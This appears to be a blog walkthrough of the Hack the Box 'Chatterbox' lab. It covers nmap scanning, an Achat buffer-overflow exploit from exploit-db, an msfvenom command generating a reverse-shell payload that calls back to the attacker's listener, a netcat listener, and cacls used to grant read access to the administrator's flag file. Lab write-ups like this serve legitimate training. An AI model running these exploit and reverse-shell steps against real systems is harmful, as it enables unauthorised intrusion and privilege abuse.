Hello
friends!! Today we are going to solve another CTF challenge “Chatterbox”
which is categories as retired lab presented by Hack the Box for
making online penetration practices.
Level: Easy
Task: find user.txt and root.txt file
on victim’s machine.
Since
these labs are online accessible therefore they have static IP. The IP of chatterbox
is 10.10.10.74 so let’s initiate with nmap port enumeration.
nmap -p1-10000 10.10.10.74
It
has shown two ports are open but didn’t disclose running services through them.
Therefore we took help from Google and asked to look for any
exploit related to these port as shown in the below image. So it put up two
exploits related to Achat. First, we tried Metasploit exploit to compromise
victim’s machine and almost successfully seized meterprerter session, but the
session was getting died in few seconds.
Thus we choose the manual technique to compromise victim's
machine by using exploit DB 36025.
Exploit 36025 is already stored inside Kali Linux and we
have copied it on the Desktop.
cd Desktop
cp
/usr/share/exploitdb/exploits/windows/remote/36025.py .
cat 36025.py
According to this python script, it is exploitable to Buffer
overflow and highlighted msfvenom code is used to generate payload.
With the help of above script we execute following command
to generate payload.
msfvenom -a x86
--platform Windows -p windows/shell_reverse_tcp lhost=10.10.14.25 lport=1234 -e
x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff'
BufferRegister=EAX -f python
Then copied the
generated shellcode.
Now open the original 36025.py which you have saved on the
desktop and paste above-copied shellcode here and then enter victim’s IP
(10.10.10.74) as Server_address. Now start Netcat for reverse connection before
running this script.
nc -lvp 1234
Now run your python script to lunch Buffer overflow attack
on victim’s machine.
python 36025.py
BOOooOOMM!! Here we command shell of victim’s machine. Let’s
finish this task by grabbing both flags.
Inside C:\Users\Alfred\Desktop
we found user.txt flag used type “filename” command for reading this file.
cd Desktop
type user.txt
Great!! We got our 1st flag
successfully
Inside C:\Users \Administrator \Desktop I
found the root.txt file and used type “filename” command
for reading this file.
cd Desktop
type root.txt
But this file didn’t
open due to less permission.
With help of following cacls
command, we can observe the permission and can change the file's permissions
where we had granted read operate to User: Alfred for the root.txt file.
cacls C:\Users \Administrator
\Desktop
cacls root.txt /g Alfred:r
type root.txt
Congratulation!! 2nd
Task is also completed
0 comments:
Post a Comment